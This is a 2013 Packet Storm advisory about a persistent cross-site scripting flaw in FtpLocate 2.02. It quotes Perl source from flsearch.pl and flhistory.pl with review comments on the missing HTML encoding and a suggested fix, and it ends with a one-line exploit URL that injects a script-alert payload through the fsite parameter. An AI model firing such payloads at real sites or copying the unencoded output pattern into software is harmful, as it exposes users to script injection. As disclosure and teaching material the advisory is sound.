ID PACKETSTORM:122144
Type packetstorm
Reporter Chako
Modified 2013-06-24T00:00:00
Description
`
#############################################################
#
# Exploit Title: FtpLocate 2.02 Persistent XSS
# Date: 2013/6/23
# Exploit Author: Chako
# Firmware Version: 2.02
# Tested on: Windows 7
# Vendor Homepage: http://turtle.ee.ncku.edu.tw/ftplocate/readme.english.html
# http://www.freshports.org/ftp/ftplocate/
# File Download: ftp://ftp.freebsd.org/pub/FreeBSD/ports/distfiles/ftplocate-2.02.tar.gz
#############################################################
/bin/flsearch.pl (LINE: 22-34)
-----------------------------------------------------------------------------
# Excerpt from flsearch.pl: request parameters are read from %input and the
# strings used later for result naming, paging links and output are derived.
# NOTE(review): clean_str() is not shown in this excerpt. The sample output in
# this advisory shows <script> markup from fsite surviving it, so it should not
# be treated as an HTML encoder -- confirm against the full source.
$query=clean_str($input{'query'}); $query_raw=CGI::escape($query);
# $fsite_raw is the URL-encoded copy; plain $fsite keeps whatever clean_str() left in it.
$fsite=clean_str($input{'fsite'}); $fsite_raw=CGI::escape($fsite);
# 'page' is taken as-is: no clean_str() call or other validation is visible here.
$page=$input{'page'};
$client=ip2fqdn(client_ip());
if ( $fsite eq "" ) {
# No site filter supplied: only the URL-encoded query is used.
$resultfname=$query_raw;
$CGIF="";
$STRF="";
} else {
# The un-encoded $fsite (not $fsite_raw) is appended to $resultfname and kept in
# $STRF for output. Only $CGIF uses the URL-encoded form. Any value derived from
# $fsite needs HTML encoding (e.g. CGI::escapeHTML) where it is written into a page.
$resultfname=$query_raw."-$fsite";
$CGIF="&fsite=$fsite_raw"; # for cgi page list
$STRF=" $fsite"; # for output
}
-----------------------------------------------------------------------------
/bin/flhistory.pl (LINE: 85-110)
-----------------------------------------------------------------------------
# Excerpt from flhistory.pl: renders a window of @log as HTML table rows,
# walking from index $rmax down to $rmin.
$rmax=$#log-$logmin;
$rmin=$#log-$logmax;
for ($i=$rmax; $i>=$rmin; $i--) {
# Each log line is split on whitespace into at most 8 fields; the fifth lands in $_.
($date, $time, $usedtime, $client, $_, $cache, $founditem, $query)=split(/\s/,$log[$i],8);
# $_ has the form script(fsite); both parts are read back from the log verbatim.
($script,$fsite)=/(.*)\((.*)\)/;
# Entries whose script name matches "flserv" are shown and linked as flsearch.
if ( $script =~ "flserv" ) { $script="flsearch"; }
# $query is URL-encoded for the link, but $fsite is concatenated without CGI::escape.
$url=dirname($ENV{'SCRIPT_NAME'})."/$script.pl?query=".CGI::escape($query)."&fsite=$fsite";
# NOTE(review): safe_query_str() is not shown; presumably it makes $query safe
# for display -- confirm against the full source.
$q=safe_query_str($query);
# Rows whose client equals $nowclient are highlighted in red.
if ( $nowclient eq $client ) {
$color="#c00000";
} else {
$color="#000000";
}
# Output sink: every logged field below is interpolated into the markup without
# HTML encoding. This matches the advisory's sample output, where $fsite reaches
# the page in the "$script($fsite)" cell; it is also embedded in href="$url".
# Mitigation: HTML-encode each field before printing (e.g. CGI::escapeHTML) and
# URL-encode $fsite with CGI::escape when building $url, as is done for $query.
print qq|<tr>
<td nowrap><font size=-1>$date</font></td>
<td nowrap><font size=-1>$time</font></td>
<td align=center nowrap><font size=-1>$usedtime</font></td>
<td nowrap><font size=-1 color=$color>$client</font></td>
<td nowrap><font size=-1 color=#999999>$script($fsite)</font></td>
<td align=center nowrap><font size=-1>$cache</font></td>
<td align=center nowrap><font size=-1>$founditem</font></td>
<td nowrap><font size=-1><a href="$url">$q</a></font></td>
</tr>
|;
}
-----------------------------------------------------------------------------
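Sample output from flhistory.pl once such a request has been logged (the fsite value appears in the history table without HTML encoding):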
-----------------------------------------------------------------------------
<td nowrap><font size=-1 color=#999999>flsearch(<script>alert('xss')</script>)</font></td>
Exploit:
-----------------------------------------------------------------------------
http://Target_Example/cgi-bin/ftplocate/flsearch.pl?query=FTP&fsite=<script>alert('xss')</script>
`
{"sourceHref": "https://packetstormsecurity.com/files/download/122144/FtpLocate_2.02_Persistent_XSS.txt", "sourceData": "` \n \n############################################################# \n# \n# Exploit Title: FtpLocate 2.02 Persistent XSS \n# Date: 2013/6/23 \n# Exploit Author: Chako \n# Firmware Version: 2.02 \n# Tested on: Windows 7 \n# Vendor Homepage: http://turtle.ee.ncku.edu.tw/ftplocate/readme.english.html \n# http://www.freshports.org/ftp/ftplocate/ \n# File Download: ftp://ftp.freebsd.org/pub/FreeBSD/ports/distfiles/ftplocate-2.02.tar.gz \n############################################################# \n \n \n/bin/flsearch.pl (LINE: 22-34) \n----------------------------------------------------------------------------- \n$query=clean_str($input{'query'}); $query_raw=CGI::escape($query); \n$fsite=clean_str($input{'fsite'}); $fsite_raw=CGI::escape($fsite); \n$page=$input{'page'}; \n$client=ip2fqdn(client_ip()); \n \nif ( $fsite eq \"\" ) { \n$resultfname=$query_raw; \n$CGIF=\"\"; \n$STRF=\"\"; \n} else { \n$resultfname=$query_raw.\"-$fsite\"; \n$CGIF=\"&fsite=$fsite_raw\"; # for cgi page list \n$STRF=\" $fsite\"; # for output \n} \n----------------------------------------------------------------------------- \n \n \n/bin/flhistory.pl (LINE: 85-110) \n----------------------------------------------------------------------------- \n$rmax=$#log-$logmin; \n$rmin=$#log-$logmax; \nfor ($i=$rmax; $i>=$rmin; $i--) { \n($date, $time, $usedtime, $client, $_, $cache, $founditem, $query)=split(/\\s/,$log[$i],8); \n($script,$fsite)=/(.*)\\((.*)\\)/; \nif ( $script =~ \"flserv\" ) { $script=\"flsearch\"; } \n$url=dirname($ENV{'SCRIPT_NAME'}).\"/$script.pl?query=\".CGI::escape($query).\"&fsite=$fsite\"; \n$q=safe_query_str($query); \nif ( $nowclient eq $client ) { \n$color=\"#c00000\"; \n} else { \n$color=\"#000000\"; \n} \n \nprint qq|<tr> \n<td nowrap><font size=-1>$date</font></td> \n<td nowrap><font size=-1>$time</font></td> \n<td align=center nowrap><font 
size=-1>$usedtime</font></td> \n<td nowrap><font size=-1 color=$color>$client</font></td> \n<td nowrap><font size=-1 color=#999999>$script($fsite)</font></td> \n<td align=center nowrap><font size=-1>$cache</font></td> \n<td align=center nowrap><font size=-1>$founditem</font></td> \n<td nowrap><font size=-1><a href=\"$url\">$q</a></font></td> \n</tr> \n|; \n} \n----------------------------------------------------------------------------- \n \n \nSample Output from flhistory.pl : \n----------------------------------------------------------------------------- \n<td nowrap><font size=-1 color=#999999>flsearch(<script>alert('xss')</script>)</font></td> \n \n \nExploit: \n----------------------------------------------------------------------------- \n \nhttp://Target_Example/cgi-bin/ftplocate/flsearch.pl?query=FTP&fsite=<script>alert('xss')</script> \n \n \n \n \n`\n", "edition": 1, "references": [], "modified": "2013-06-24T00:00:00", "hash": "0f75b518d85b75272a354747e225436338d7659f5f7f6b41af45f041884ce8a7", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/122144/FtpLocate-2.02-Cross-Site-Scripting.html", "description": "", "id": "PACKETSTORM:122144", "reporter": "Chako", "lastseen": "2016-11-03T10:17:31", "published": "2013-06-24T00:00:00", "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:17:31"}, "dependencies": {"references": [], "modified": "2016-11-03T10:17:31"}, "vulnersScore": -0.4}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "FtpLocate 2.02 Cross Site Scripting", "viewCount": 7, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "cbf42c91e45d62f7e63c83c1f15ffc39", "key": "href"}, 
{"hash": "80c2da593ca3623c22b086d765467846", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "80c2da593ca3623c22b086d765467846", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "09f3de637b3157be68e85e9036d4475a", "key": "reporter"}, {"hash": "c7497608577e1118ddb744bd73901077", "key": "sourceData"}, {"hash": "e0dc8220e3a00f6d29bde9dc02bd6021", "key": "sourceHref"}, {"hash": "81dc4dfb222c958865be4ac8031decf2", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}
{}